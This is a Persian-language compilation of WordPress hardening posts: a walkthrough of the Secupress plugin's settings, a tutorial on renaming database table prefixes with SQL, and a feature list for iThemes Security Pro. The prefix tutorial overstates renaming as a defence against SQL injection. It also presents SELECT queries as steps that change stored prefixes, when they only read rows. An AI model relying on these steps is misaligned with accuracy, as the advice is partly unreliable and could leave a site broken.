Login Control: در این بخش می‌توانید با تیک زدن گزینه اول تعیین کنید یک کاربر چند بار می‌تواند ورود ناموفق داشته باشد تا مسدود شود. این عدد به صورت پیش فرض روی ۱۰ بار تنظیم شده است. همچنین می‌توانید مدت زمانی که کاربر باید مسدود بماند نیز تغییر دهید که پیشنهاد می‌شود بین ۵ تا ۱۵ دقیقه را برای محافظت از وردپرس انتخاب کنید. در صورتی که گزینه دوم را هم تیک بزنید، افزونه کاربرانی را که قصد دارند با یوزنیم‌هایی که اصلا وجود ندارند به سایتتان وارد شوند، مسدود می‌کند.

 

Login Errors: با تیک زدن گزینه مربوطه، در صورتی که کاربر ورود ناموفق داشته باشد، جزئیات دلیل ناموفق بودن ورودش را دریافت نخواهد کرد. به عنوان مثال کاربری یوزنیم را درست وارد کرده و رمز عبورش را اشتباه وارد می‌کند؛ در صورتی که این گزینه غیر فعال باشد، پیام “رمز عبور برای این یوزنیم اشتباه است” نمایش داده خواهد شد؛ که در این حالت کاربر مطمئن است یوزرنیم درست وارد شده و فقط رمز عبور اشتباه است. اما در صورت فعال بودن گزینه مذکور، پیام “عملیات ورود با شکست مواجه شد” را نمایش می‌دهد. این گزینه زمانی کاربرد دارد که افرادی قصد حدس زدن یوزرنیم و پسورد کاربری خاص در سایت شما را دارند.

 

Use a Captcha for everyone: با تیک زدن گزینه مربوطه، در فرم‌های ورود، گزینه‌ای فعال می‌شود که کاربر باید علاوه بر وارد کردن یوزنیم و پسورد خود، گزینه امنیتی را نیز باید تیک بزند تا ثابت کند ربات نیست. این امر می‌تواند در افزایش امنیت ورود به سایت و محافظت از وردپرس تاثیر چشم گیری داشته باشد؛ اما ممکن است برای برخی کاربران خسته کننده باشد.

محافظت از وردپرس با افزونه Secupress

Password changement:  می‌توانید با تیک زدن این گزینه، کاربران را هنگام تعویض رمز عبور خود، محبور به وارد کردن رمز عبور قبلی‌شان کنید.

Usernames: با تیک زدن گزینه اول، هنگام ثبت نام کاربران، آن‌ها را محبور می‌کنید تا از یوزرنیم‌های معمول و کم ارزش مانند admin یا www و … استفاده نکنند و یوزرنیم یونیک خود را داشته باشند. گزینه دوم برای محدود کردن اسکریپت‌های مخرب برای پیدا کردن یوزنیم کاربران خاص است که به صورت author=1 یوزنیم‌های کاربران را اسکن می‌کنند.

Login Page: می‌توانید آدرس ورود ادمین سایت یا ورود کاربران را که به صورت پیشفرض wp-admin و wp-login است، تغییر دهید. این مورد می تواند در امنیت سایتتان کارآمد باشد.

محافظت از وردپرس با افزونه Secupress

سربرگ Plugins & Themes

در وردپرس می‌توان به صورت پیشفرض، قالب‌ها و افزونه‌های مختلف را از طریق منوی افزودن روی هاست آپلود کرد. با فعال کردن گزینه Disallow .zip Uploads، این قابلیت وردپرس غیر فعال خواهد شد. چرا که ممکن است قالب‌ها و افزونه‌های آپلود شده از این طریق دارای کدهای مخرب باشند. زمانی که این گزینه فعال باشد، فقط از طریق مخزن وردپرس و یا FTP می‌توانید قالب‌ها و افزونه‌های جدید را به سایت خود اضافه کنید. در نظر داشته باشید در صورتی که از قالب‌ها و افزونه‌های ایرانی استفاده می‌کنید، این ویژگی، کار را برای شما سخت‌تر خواهد کرد و مجبورید قالب‌ها و افزونه‌ها را از طریق هاست خود آپلود کنید. در کل این ویژگی برای محافظت از وردپرس خیلی پیشنهاد نمی‌شود.

 

دو گزینه Plugin installation و Theme installation مربوط به عدم فعال‌سازی هر قالب یا افزونه جدید است. به اینصورت که به شما (یا مدیران دیگر سایتتان) اجازه فعال سازی یا به طور کلی آپلود قالب یا افزونه جدید را نمی‌دهد. فرق این گزینه با بخش قبلی این است که می‌توان اجازه آپلود فایل‌های zip را محدود به نوع آن (قالب یا افزونه) کرد.

محافظت از وردپرس با افزونه Secupress

سربرگ WordPress Core

بخش‌های مختلف این سربرگ تنظیماتی را اعمال می‌کنند که از آن‌ها به عنوان “ترفندهای وردپرس” یاد می‌شود.

 

بخش Minor Updates: وردپرس به صورت خودکار، هنگامی که آپدیت‌های جزئی ارائه می‌شوند، خودش را آپدیت می‌کند. اما ممکن است یکی از افزونه‌های سایت شما اجازه این کار را ندهد. اما معمولا آپدیت‌های جزئی وردپرس مربوط به مسائل امنیتی هستند و به طور معمول اختلالی در افزونه‌های شما ایجاد نمی‌کنند. با فعال کردن این گزینه به وردپرس اجازه می‌دهید بدون در نظر گرفتن افزونه‌ها، آپدیت‌های جزئی مثل ۴٫۳٫۹ را به طور خودکار انجام دهد و گامی در محافظت از وردپرس بردارد.

 

بخش Major Updates: با فعال کردن این گزینه، وردپرس را مجبور می‌کنید آپدیت‌های کلی را مثل ۴٫۴ به صورت خودکار انجام دهد. توجه داشته باشید که فعال کردن این گزینه اجباری نیست اما از طرف سازنده برای محافظت از وردپرس پیشنهاد شده است.

 

بخش File edition: به صورت پیشفرض، مدیران سایت می‌توانند کدهای قالب و افزونه‌ها را از طریق ویرایشگر وردپرس و در فضای پیشخوان، تغییر دهند. از نظر افزونه امنیتی Secupress این قابلیت مطلوب نیست و باید غیر فعال شود. با تیک زدن این گزینه می‌توانید این قابلیت را غیر فعال کنید تا تغییر در کدها فقط از طریق هاست امکان‌پذیر باشد.

محافظت از وردپرس با افزونه Secupress

بخش Unfiltered Uploads: مدیران و نویسندگان سایت می‌توانند فایل‌های مختلفی را از طریق پرونده چند رسانه‌ای وردپرس روی سایتتان آپلود کنند. فعال کردن این گزینه فقط به فایل‌هایی با پسوند مجاز مثل pdf ، mp3 ، و… اجازه آپلود می‌دهد.

 

سربرگ Sensitive Data

در این سربرگ تنظیمات مختلفی وجود دارد که با استفاده از آن‌ها می‌توانید با محدود کردن برخی از داده‌های حساس، امنیت سایت وردپرسی‌تان را افزایش دهید.

بخش XML-RPC: فایل xml-rpc.php در وردپرس برای ایجاد ارتباط بین وردپرس و نرم افزارهای دیگر استفاده می‌شود. مانند اپلیکیشن‌های مدیریت سایت وردپرسی روی تلفن‌های همراه که اطلاعات را از طریق این فایل منتقل می‌کنند. این فایل راه نفوذی به سایت شما ایجاد می‌کند. در صورتی که از اپلیکیشن‌های مدیریت وردپرس روی گوشی خود استفاده نمی‌کنید یا اپلیکیشن خبری یا فروشگاهی به سایتتان متصل نیست، بهتر است با فعال کردن این گزینه، فایل مذکور را از دسترس خارج کنید و محافظت از وردپرس را امکان‌پذیر سازید.

 

بخش Blackhole: فعال کردن این گزینه، اطلاعاتی را در فایل robots.txt اضافه می‌کند که در صورت مشاهده رفتار مخرب ربات‌ها، IP آن‌ها را مسدود می‌کند.

 

بخش Directory Listing: گاهی اوقات با وارد کردن آدرس یک پوشه، محتویات آن به صورت لیست نمایش داده می‌شود. این اتفاق برای پوشه‌هایی می‌افتد که خودمان ایجاد کرده‌ایم. در آن به عنوان مثال آهنگ‌ها را آپلود کرده‌ایم. با وارد کردن آدرس پوشه اصلی، لیست تمام آهنگ‌ها به نمایش در می‌آید که از لحاظ امنیتی مناسب نیست و کاربر باید آدرس دقیق فایل را وارد کند تا به آن دسترسی داشته باشد. بعد از فعال کردن این گزینه، کاربر به جای مشاهده لیست فایل‌ها، با خطای ۴۰۳ مواجه می‌شود.

محافظت از وردپرس با افزونه Secupress

بخش PHP disclosure: زبان PHP به طور اشتباه اطلاعاتی از ماژول‌های نصب شده را افشا می‌کند که برای امنیت سایت چندان خوشایند نیست و با فعال کردن این گزینه می‌توانید از آن جلوگیری کرده و محافظت از وردپرس را امکان‌پذیر سازید.

 

بخش PHP version disclosure: در برخی از صفحات سایت روی بعضی از سرورها، ورژن PHP را که شما در حال استفاده از آن هستید نمایش می‌دهد که می‌تواند کمکی برای حمله به سایت شما باشد. با فعال کردن این گزینه، اطلاعات ورژن PHP نمایش داده نخواهد شد.

محافظت از وردپرس با افزونه Secupress

بخش WordPress version disclosure: اگر از صفحه سایت خود Inspect بگیرید، متوجه می‌شوید که شماره نسخه وردپرس شما را در جاهای مختلف نمایش می‌دهد که می‌تواند برای هکرها کمکی جهت حمله بهتر باشد. با فعال کردن این گزینه، تمامی اعداد مربوط به نسخه وردپرس از کدهای سایتتان حذف خواهد شد.

محافظت از وردپرس با افزونه Secupress

بخش Bad URL Access: دسترسی مستقیم به برخی از فایل‌های حساس وردپرس را محدود می‌کند که برای محافظت از وردپرس می‌توانید آن را فعال کنید.

بخش Protect readme files: فایل‌های readme.txt می‌توانند اطلاعات خوبی را به هکرها برای یک حمله محاسبه شده بدهند. با فعال کردن این گزینه آن‌ها را از دسترس هکرها خارج کنید.

 

سربرگ Firewall

در این سربرگ تنظیمات مختلفی برای بلاک کردن درخواست‌های مخرب و مشکوک وجود دارد.

بخش Bad Headers: در این بخش ۳ گزینه مختلف وجود دارد که به ترتیب برای محافظت از وردپرس از کاربران مخرب همانند ربات‌ها، درخواست‌های غیر مجاز و ربات‌های ناشناخته برای بررسی سئو وردپرس است.

 

بخش Malicious URLs: با تنظیمات این بخش می‌توانید، URL های مخرب را کنترل کنید یا جلوی دستکاری آن‌ها را بگیرید. گزینه اول این بخش برای بلاک کردن URL های مخرب است که ممکن است توسط افزونه‌ها یا کاربران سایتتان ایجاد شده باشد. گزینه دوم اسکنرهای SQLi را بلاک می‌کند و گزینه سوم هم افرادی را که دنبال فایل PHP خاص یا مخربی هستند، با صفحه ۴۰۴ رو به رو می‌کند و سپس آن‌ها را بلاک می‌کند. این تنظیمات، تخصصی هستند و شاید خیلی کارامد نباشند. اما با گذشت زمان در صورت نیاز می‌توانید آن‌ها را فعال کنید.

 

سربرگ Anti Spam

اسپم‌ها همیشه آزاردهنده هستند. ماژول آنتی اسپم افزونه Secupress امکانات خوبی برای مقابله با اسپم‌ها برای ما فراهم می‌کند. اسپم‌ها معمولا در بخش کامنت‌ها به چشم می‌خورند. مبارزه با آن‌ها از راهکارهای امنیتی مهم برای هر سایتی به شمار می‌آید. با فعال کردن این ماژول، تنظیمات آن نمایش داده خواهد شد.

محافظت از وردپرس با افزونه Secupress

در بخش Handling Spam تعیین می کنید که اسپم‌ها برای همیشه در دیتابیس ذخیره بمانند یا پس از ۳۰ روز حذف شوند. با فعال کردن بخش Shortcode Usage، اگر کاربری در ارسال دیدگاه در متن آن از شورت کدها استفاده کند، به عنوان اسپم شناخته خواهد شد.

 

Improve the WordPress comments blacklist این امکان را برای شما فراهم می کند تا از بیش از ۲۰۰۰۰ کلمه  از قبل آماده شده که به عنوان اسپم شناخته می‌شوند استفاده کنید. این کلمات در زبان‌های مختلف آماده شده‌اند که می‌تواند کار شما را راحت‌تر کند.

 

بخش آخر Pingbacks & Trackbacks است که در صورتی که از آن‌ها استفاده‌ای ندارید، برای امنیت بیشتر می‌توانید آن‌ها را با تیک زدن گزینه مربوطه غیرفعال کنید.

 

سربرگ Logs

در این سربرگ ۲ بخش مهم وجود دارد که به شرح آن‌ها می‌پردازیم:

محافظت از وردپرس با افزونه Secupress

بخش Actually Banned IPs: لیستی از IP های بلاک شده را نشان می‌دهد که در صورت تمایل می‌توانید آن‌ها را در صورت نیاز از این حالت خارج کنید. همچنین می‌توانید IP جدیدی را برای مسدود شدن به لیست اضافه کنید.

بخش IPs :Whitelist IP هایی که هرگز نباید مسدود شوند در این لیست قرار می‌گیرند. همانند IP مدیران سایت. این بخش تنها زمانی کاربرد دارد که شما از IP ثابت استفاده کنید.

محافظت از وردپرس با افزونه Secupress

با فعال کردن گزینه WordPress action logs، لیستی از فعالیت های روزمره وردپرس، همانند تغییرات پسورد و پروفایل کاربران، تغییرات ایمیل و … نمایش داده می‌شود. گزینه Error Pages Log 404 لیستی از صفحه‌های ۴۰۴ که برخی افراد مکرر با آن مواجه شده‌اند را به شما نمایش می‌دهد که ممکن است برخی ربات‌های مخرب برای پیدا کردن صفحاتی خاص در سایت شما با این صفحات رو به رو شده باشند.

 

سربرگ Alerts

در این ماژول فقط یکی از ویژگی‌ها در نسخه رایگان فعال است. در بخش Email Notifications، ایمیل خود را وارد کنید تا خلاصه رویدادهای امنیتی سایتتان برای شما ایمیل شود. اگر می‌خواهید گزارش‌ها به چند ایمیل مختلف ارسال شود، در هر خط یکی از ایمیل‌ها را وارد کنید.

 

سایر ماژول‌های این افزونه در نسخه پولی و حرفه‌ای آن در دسترس است.

 

اسکن امنیت وردپرس با Secupress

بسیار خوب! تا اینجا با ماژول های افزونه امنیت وردپرس Secupress  آشنا شدیم. حالا می‌خواهیم از اسکنر این افزونه برای اسکن امنیت وردپرس و محافظت از وردپرس استفاده کنیم. در منوی سمت راست وردپرس، در منوی افزونه Secupress، روی گزینه Scanners کلیک کنید.

 

محافظت از وردپرس با افزونه Secupress

در صفحه باز شده، ۴ مرحله اسکن امنیت را مشاهده می‌کنید. روی دکمه Scan My Website کلیک کنید تا فرایند اسکن شروع شود.

محافظت از وردپرس با افزونه Secupress

همانطور که مشاهده می کنید، اسکنر این افزونه تمامی موارد امنیتی را که قبلا معرفی کردیم، بررسی می‌کند. اگر پیغام BAD یا WARNING را کنار هر مورد دریافت کردید، با رفتن به منوی Modules افزونه، مورد را رفع کنید. همچنین افزونه به شما درجه‌ای را نشان می‌دهد که نشان‌دهنده میزان امنیت سایت شماست. وقتی این درجه به A تبدیل شد، یعنی امنیت سایت شما قابل قبول است. دقت کنید بعضی هشدارهای اسکنر با ماژول‌هایی رفع می‌شوند که در نسخه رایگان در دسترس نیستند و برای حل این مشکل باید نسخه حرفه‌ای را خریداری کنید.

 

با کلیک کردن روی گزینه Next Step، به مرحله دوم اسکن که Auto Fix است، می روید. این مرحله در نسخه حرفه‌ای در دسترس است و خطاهای صفحه قبل را به طور خودکار رفع می‌کند. اما در نسخه رایگان شما باید به صورت دستی ماژول‌های لازم را فعال نمایید. در مرحله سوم هم می‌توانید به صورت دستی از صحت فعال بودن ماژول‌ها اطمینان حاصل کنید و در مرحله آخر، نتیجه اسکن و لینک‌های ماژول‌ها و همچنین نتیجه محافظت از وردپرس را در اختیارتان قرار می‌دهد.

 

نتیجه گیری

اگر محافظت از وردپرس برایتان اهمیت دارد و به دنبال یک افزونه کاربردی، با گرافیک خوب و تنظیمات راحت هستید، می توانید از افزونه امنیت وردپرس Secupress استفاده کنید. این افزونه با ماژول‌های متعددی که در اختیار شما می‌گذارد، امنیت سایتتان را به درجه خوبی می‌رساند.

نوشته محافظت از وردپرس با افزونه Secupress اولین بار در بیست اسکریپت. پدیدار شد.



لینک منبع مطلب

آموزش تغییر پیشوند جداول وردپرس برای امنیت بیشتر

آموزش تغییر پیشوند جداول وردپرس برای امنیت بیشتر

۵ از ۱ رای


آموزش تغییر پیشوند جداول وردپرس

همانطور که اطلاع دارید دیتابیس یک عامل اصلی برای اجرا شدن سایت وردپرسی هست. همه اطلاعات اصلی مثل پسوردها، نام کاربری، اطلاعات نوشته‌ها و تنظیمات وردپرس شما در دیتابیس ذخیره خواهند شد. در کل می‌توان دیتابیس را به عنوان مغز اصلی وردپرس شما معرفی کرد.

در هر صورت باید مواظب این مغز باشید چون بصورت متداول هکر‌ها سعی می‌کنند با استفاده از SQL Injection در دیتابیس شما اقدام به تغییر اطلاعات سایتتان کنند. حالا همانطور که در دوره آموزش امنیت وردپرس توضیح دادم، باید کاری کنید که این SQL Injection‌ها روی سایت شما تاثیری نداشته باشد.

بهترین راه برای گول زدن هکر هم این هست که مسیری که دنبال می‌کنند را تغییر دهید تا با بن‌بست روبرو شوند! حالا چطور و چگونه؟

در این مطلب می‌خوانید:

تغییر پیشوند جداول وردپرس

اول اجازه بدید توضیح بدم که پیشوند جداول دیتابیس وردپرس دقیقا چیست؟ وقتی در حال نصب وردپرس هستید یک گزینه به نام پیشوند جداول به شما نمایش داده می‌شود که بصورت پیشفرض _wp هست. شما اجازه تغییر آنرا به هر اسمی که دوست داشته باشید دارید. اگر خاطرتان باشد، در آموزش نصب وردپرس به شما توصیه کردیم که این پشوند را تغییر دهید.

در واقع این پیشوند‌ها قبل از نام جداول دیتابیس شما قرار خواهند گرفت و با تغییر آنها، مسیر کلی جداول دیتابیس تغییر خواهد کرد و این یعنی همان تغییر آدرس و به به بن‌بست خوردن هکر!

آموزش تغییر پیشوند جداول دیتابیس وردپرس

برای اینکار باید چند مرحله انجام شود که بصورت قدم به قدم به شما این مراحل را توضیح خواهم داد.

ابتدا، از دیتابیس خود بک آپ بگیرید.

اولین قدم این هست که برای محکم کاری بیشتر، از دیتابیس خود بک آپ گیری کنید. برای اینکار می‌توانید آموزش بک آپ گیری از وردپرس را ببینید. البته اگر وبمستر طلایی هستید نیازی به آموزش دیدن نیست. 🙂

تغییر پیشوند جداول در فایل wp-config.php

بعد از بک آپ گیری از دیتابیس وردپرس، وارد فایل wp-config.php شوید. این فایل در پوشه روت یا همان public_html سایت شما قرار دارد. آنرا با یک ویرایشگر باز کنید. در اینجا عبارت table_prefix را جستجو کنید. این عبارت در خطی شبیه به زیر وجود دارد.

$table_prefix  = 'wp_';

حالا عبارت wp_ را به عبارت دیگری ( مثلا: mw_ ) تغییر دهید. با اینکار عملا جداول شما از این آدرس خوانده می‌شود.

نکته: شما می‌توانید از عدد، عبارت و _ در پیشوند استفاده کنید. عباراتی مثل $ یا % مجاز نیست!

تغییر پیشوند جداول دیتابیس از PHPMyAdmin

برای اینکار وارد کنترل پنل هاست خود شوید. اگر از سی پنل استفاده می‌کنید، وارد صفحه ورود سی پنل شوید.

رفتن به Cpanel

بعد از وارد شدن به سی پنل، روی PHPMyAdmin کلیک کنید.

phpmyadmin

وقتی وارد مدیریت دیتابیس‌ها شدید، از سمت چپ دیتابیس وردپرس خودتان را انتخاب کنید:

نام دیتابیس

بعد از انتخاب دیتابیس، از بالای صفحه روی گزینه Sql کلیک کنید.

انتخاب sql

حالا این عبارت را در بخش SQL وارد کنید.

RENAME table wp_commentmeta TO mw_commentmeta;
RENAME table wp_comments TO mw_comments;
RENAME table wp_links TO mw_links;
RENAME table wp_options TO mw_options;
RENAME table wp_postmeta TO mw_postmeta;
RENAME table wp_posts TO mw_posts;
RENAME table wp_terms TO mw_terms;
RENAME table wp_termmeta TO mw_termmeta;
RENAME table wp_term_relationships TO mw_term_relationships;
RENAME table wp_term_taxonomy TO mw_term_taxonomy;
RENAME table wp_usermeta TO mw_usermeta;
RENAME table wp_users TO mw_users;

با اینکار، نام جداول دیتابیس شما از wp_ به mw_ تغییر خواهد یافت. حالا اگر جدولی بیش از جداول پیشفرض وردپرس دارید، باید یک خط جدید به این دستور اضافه کنید. دقت کنید عبارت mw_ را باید به عبارتی که در wp-config.php وارد کردید، تغییر دهید. بعد از اضافه کردن خط به تعداد جداول دیتابیس سایتتان، روی Go کلیک کنید تا دستور اجرا شده و نام تمام جداول دیتابیس شما تغییر کند.

جدول options در دیتابیس

جدول wp_options خودش دارای ردیف‌هایی هست که از پیشوند دیتابیس استفاده می‌کنند. برای تغییر این پیشوند‌ها، دستور زیر را در SQL اجرا کنید.

SELECT * FROM mw_options WHERE option_name LIKE '%wp_%'

جدول UserMeta در دیتابیس

جدول usermeta نیز دارای اطلاعاتی حیاتی هست که باید حتما تغییر کند. پس دستور زیر را هم اجرا کنید.

SELECT * FROM mw_usermeta WHERE meta_key LIKE '%wp_%'

حالا سایتتان را تست کنید. امید است که مشکلی بوجود نیامده باشد. در صورتی که مشکلی بوجود آمد بک آپ دیتابیس را بازگردانی کنید و مراحل را مجدد انجام دهید. دقت داشته باشید در این آموزش از پیشوند mw_ استفاده شد. اگر شما پیشوند دیگری را استفاده کردید، حتما می‌بایست در تمام دستورات SQL از پیشوند خودتان به جای mw_ استفاده کنید.

موفق باشید. 😉



لینک منبع مطلب

افزونه فوق امنیتی وردپرس Security Pro نسخه ۵٫۵٫۶

افزونه iThemes Security Pro جزو افزونه هایی است که جای آن در هیچ سایت قدرت گرفته از وردپرسی نباید خالی باشد. حال اگر میخواهید چند قدم از دیگر جلو تر باشید و امنیت وبسایت خود را به شکل چشمگیری افزایش دهید، بهتر است از نسخه ی حرفه ای این افزونه یعنی iThemes Security Pro استفاده کنید. افزونه iThemes Security Pro علاوه بر دارا بودن امکانات نسخه ی رایگان خود، امکانات جدید و جالبی را به شما ارائه میکند که میتوانند در امن کردن سایت وردپرسی شما به شکل چشمگیری موثر باشند. در ادامه سعی میکنیم به امکانات بخش های مختلف افزونه iThemes Security Pro اشاره کنیم. با ما همراه باشید.

افزونه فوق امنیتی وردپرس Security Pro نسخه 5.5.6

محافظت در برابر حملات Brute Force

با استفاده از تنظیمات مخصوص جلوگیری از حملات بروت فورس در افزونه iThemes Security pro میتوانید حداکثر دفعات تلاش ناموفق برای ورود به وردپرس را تعیین کنید. به این شک اگر کسی بخواهد با حدس زدن رمز به وردپرس لاگین کند، پس از رسیدن به حداکثر مجاز دفعات تلاش برای ورود، به صورت اتوماتیک بن شده و از دسترسی او به سایت جلوگیری خواهد شد.

تشخیص تغییر فایل ها

اگر کسی بتواند به نحوی به سایت شما نفوذ کند، یکی از اولین کارهاش تزریق کد مخرب به فایل های وردپرس شما خواهد بود. با ویژگی File change Detection در افزونه iThemes Security Pro میتوانید از طریق دریافت هشدار های ایمیلی از این مسئله آگاه شوید و در صورتی که وبسایت شما هک شده باشد، به سرعت اقدامات لازم را انجام دهید.

تشخیص خطای ۴۰۴

اگر یک ربات به دنبال تشخیص نقاط آسیب پذیر، وبسایت شما را اسکن کند، بدون شک به تعداد زیادی خطای ۴۰۴ برخورد خواهد کرد. با استفاده از ویژگی ۴۰۴ Detection شما میتوانید کاری کنید که در صورتی که شخصی در بازه ی زمانی مشخص، تعداد زیادی خطای ۴۰۴ دریافت کند، آدرس IP او به صورت اتوماتیک بن شده و از دسترسی او به سیستم جلوگیری شود.

اجبار استفاده از رمز قوی

یکی از موارد پایه ای که میتواند منجر به امن تر شدن سایت شما شود، استفاده از رمز های مناسب است. با استفاده از این ویژگی شما میتوانید کاربران سایت خود را مجبور به استفاده از رمز های قوی و مناسب کنید.

جلوگیری از دسترسی کاربران مشکوک

با استفاده از این ویژگی میتوانید با بن کردن آی پی افراد خرابکار، از دسترسی آنها به سیستم جلوگیری کند. افزونه iThemes Security Pro میتواند در صورتی که کاربری سعی در حدس زدن رمز برای ورود به سایت داشته باشد و یا دفعات خاصی با خطای ۴۰۴ مواجه شده باشد، به طور اتوماتیک از دسترسی او به سیستم جلوگیری کند. این افزونه همچنین به blacklist ربات ها نیز مجهز است و از این طریق میتواند جلوی دسترسی بات هایی که از قبل به عنوان خرابکار شناخته شده اند را بگیرد.

امکان قرارگیری در حالت Away Mode

اگر قرار است مدتی به ناحیه مدیریت وردپرس خود سر نزنید، با این ویژگی میتوانید امکان دسترسی به مدیریت وردپرس را برای ساعاتی خاص غیر فعال کنید تا شخص دیگری قادر به ورود به سیستم نباشد. مثلا اگر قصد دارید چند روزی به مسافرت بروید، این امکان میتواند گزینه ی مناسبی برای شما باشد.

تغییر آدرس مدیریت وردپرس

تغییر آدرس ورود به مدیریت وردپرس یکی از موارد امنیتی بسیار مهم است. وقتی آدرس ورود به ادمین وردپرس را تغییر میدهید، حدس زدن آن برای افراد خرابکار دشوار بوده و باعث میشود کسی نتواند با استفاده از اتک بروت فورس، رمز شما را پیدا کرده و وارد ناحیه مدیریت شود. چرا که شخص خرابکار در این حالت نمیداند از چه آدرسی میتواند به ناحیه مدیریت وردپرس دسترسی پیدا کند.

ایجاد بکاپ از دیتابیس

داشتن بکاپ های منظم از دیتابیس، همیشه باعث آسودگی خاطر است. اگر مرتبا از دیتابیس خود نسخه پشتیبان تهیه کنید، میتوانید مطمئن باشید که در صورت بروز مشکل، اطلاعات شما امن و قابل بازگردانی هستند. با استفاده از این امکان شما میتوانید بکاپ های دلخواه خود را تنظیم کرده و علاوه بر ذخیره ی آنها بر روی هاست، آنها را به صورت پیوست شده به ایمیل نیز دریافت کنید. برای ایجاد بکاپ های منظم، استفاده از افزونه BackupBuddy هم انتخاب بسیار مناسبی به شمار میرود.

ارسال هشدار های ایمیلی

هرگاه کسی بخاطر داشتن تعداد خاصی لاگین ناموفق به سیستم، بن شود و یا هرگاه فایلی در سایت شما تغییر کند، افزونه iThemes Security شما را از طریق ایمیل از این مسئله آگاه خواهد کرد.

تغییر کلید های امنیتی وردپرس

با استفاده از افزونه iThemes Security Pro میتوانید به سادگی کلید های امنیتی (salt) وردپرس را آپدیت کرده و از این طریق رده ی امنیت سایت خود را بالاتر ببرید.

مقایسه ی فایل ها به صورت آنلاین

قبلا هم اشاره کردیم که این افزونه به قابلیت تشخیص تغییر فایل ها مجهز است. اما امکانی که جدیدا به افزونه اضافه شده به iThemes Security Pro اجازه میدهد که فایل های هسته ی وردپرس را با فایل های موجود در wordpress.org مقایسه کند تا از این طریق مطمئن شود که تغییرات صورت گرفته در این فایلها مخرب نبوده و فایلهای هسته ی سایت شما با فایل های هسته ی رسمی وردپرس منطبق هستند.

بهره گیری از سرویس reCAPTCHA گوگل

با بهره گیری از این امکان میتوانید به بخش های مثل صفحه ورود وردپرس، ثبت نام کاربران و درج دیدگاه ها در وردپرس، امکان استفاهد از سرویس ریکپچای گوگل را اضافه نمایید. به این ترتیب از سوء استفاده ربات ها از این بخش ها جلوگیری به عمل خواهید آورد.

استفاده از لاگین دو مرحله ای Two Factor Authentication

لاگین دو مرحله ای یا Two Factor Authentication امکان بسیار مهم و جالبی است. با استفاده از این امکان لایه ی امنیتی جدیدی به سایت شما افزوده میشود. در صورت استفاده از Two Factor Authentication در زمان ورود به وردپرس لازم است که علاوه بر رمز عبور خود، کدی که بر روی موبایل خود دریافت میکنید را نیز به سیستم ارائه کنید. در این حالت حتی اگر کسی رمز شما را حدس هم بزند، به این جهت که نمیتواند کد امنیتی دوم را وارد سیستم کند، از ورود وی به وردپرس جلوگیری به عمل خواهد آمد.

بررسی امنیت کاربران در وردپرس

افراد سودجو و خرابکار، همیشه از طریق اکانت مدیر اصلی وارد وردپرس نمیشوند. داشتن یک حساب کاربری ناامن در وردپرس میتواند درهای وبسایت شما را به روی انواع خطرهای امنیتی باز کند. با استفاده از امکان بررسی امنیت کاربران در افزونه iThemes security pro شما میتوانید اکانت های کاربران را به دنبال نقاط نا امن بررسی کرده و از امنیت آنها اطمینان حاصل کنید.

این امکان میتواند به شما اعلام کند که کدام کاربران ورود دو مرحله ای را بر روی اکانت خود فعال نکرده اند و هر کاربر آخرین بار چه زمانی فعال بوده است. شما میتوانید به صورت آنی افرادی که وارد سیستم شده اند را مشاهده کرده و در صورت نیاز آنها را بلافاصله از سیستم بیرون بیاندازید تا مجبور شوند دوباره وارد سیستم شوند. شما میتوانید نقش کاربران را به صورت آنی تغییر دهید و اکانت هایی که بی کاربرد هستند یا در مدتی طولانی مورد استفاده قرار نگرفته اند را از سیستم حذف کنید.

اسکن سایت به دنبال بدافزار ها – Malware Scanning

افزونه iThemes Security Pro برای اسکن سایت از Sucuri SiteCheck استفاده میکند. شما میتوانید با این ابزار سایت خود را اسکن کنید و در صورتی که سایت شما به علت وجود Malware در بلک لیست قرار گرفته باشد، بلافاصله از این مسئله اطلاع پیدا کنید. این ابزار همچنین میتواند خطاهای احتمالی و آپدیت نبودن نرم افزار سایت را نیز به شما اعلام کند. همچنین در صورت نیاز امکان زمانبندی اسکن های روزانه نیز برای شما فراهم شده. در این حالت در صورت مشاهده مشکل، iThemes Security Pro میتواند شما را از طریق ارسال ایمیل از این امر باخبر کند.

اسکن سایت به دنبال بدافزار ها – Malware Scanning

در بالا به توضیح برخی امکانات اصلی افزونه iThemes Security Pro پرداختیم. اما امکانات این افزونه به همینجا ختم نمیشود. لیستی از امکانات کلی این افزونه به همراه امکانات اضافی آن نسبت به نسخه رایگان، برای شما درج شده.

امکانات افزونه امنیتی iThemes Security Pro :

ویژگی هایی که در زیر درج شده هم در نسخه ی رایگان و هم در نسخه ی حرفه ای افزونه موجودند.

  • بررسی امنیت سایت تنها با یک کلیک
  • بن کردن کاربران مخرب
  • بن کردن IP ها یا agent های خاص و جلوگیری از دسترسی آنها به سایت
  • تشخیص خطای ۴۰۴
  • مخفی کردن آدرس ورود به ناحیه مدیریت وردپرس
  • تغییر کلید های امنیتی وردپرس
  • حالت Away
  • ایجاد بکاپ از دیتابیس
  • تشخیص تغییر فایل ها
  • حذف اطلاعات سربرگ Windows Live Writer
  • حذف اطلاعات سربرگ RSD
  • حذف هشدار آپدیت از نقش های کاربری خاص در وردپرس
  • غیر فعال کردن خطاهای ورود
  • تغییر نام کاربری admin
  • تغییر ID کاربری که دارای شناسه ۱ باشد
  • تغییر پیشوند جداول وردپرس
  • تغییر مسیر wp-content
  • الزام استفاده از SSL برای نوشته ها، برگه ها و ناحیه مدیریت وردپرس
  • غیر فعال کردن امکان ویرایش فایل در ناحیه مدیریت وردپرس
  • کاهش کامنت های اسپم
  • جلوگیری از حملات بروت فورس
  • جلوگیری از حمله بروت فروس بر روی فایل XML-RPC
  • لاگ های امنیتی
  • ارسال ایمیل های نوتفیکیشن
  • پیام قفل شدن دسترسی قابل سفارشی سازی
  • الزام استفاده از رمز های دشوار
  • بررسی سطح دسترسی فایل ها
  • اسکن بدافزار

امکانات انحصاری افزونه iThemes Security Pro

امکاناتی که در زیر درج شده تنها در این نسخه یعنی نسخه ی حرفه ای افزونه (iThemes Security Pro) موجود هستند.

  • ابزارک داشبورد وردپرس
  • یکپارچه سازی با گوگل ریکپچا
  • سیستم لاگین دو مرحله ای یا Two Factor Authentication
  • امکان برون ریزی و درون ریزی تنظمیات
  • امکان بررسی صحت فایل های هسته ی وردپرس به صورت آنلاین
  • امکان زمانبندی اسکن Malware
  • ثبت لاگ عملیات کاربران
  • تغییر موقت نقش کاربر در بازه زمانی خاص
  • یکپارچه سازی با WP-CLI
  • پسورد های دارای تاریخ انقضا
  • بررسی امنیت کاربران
  • و..

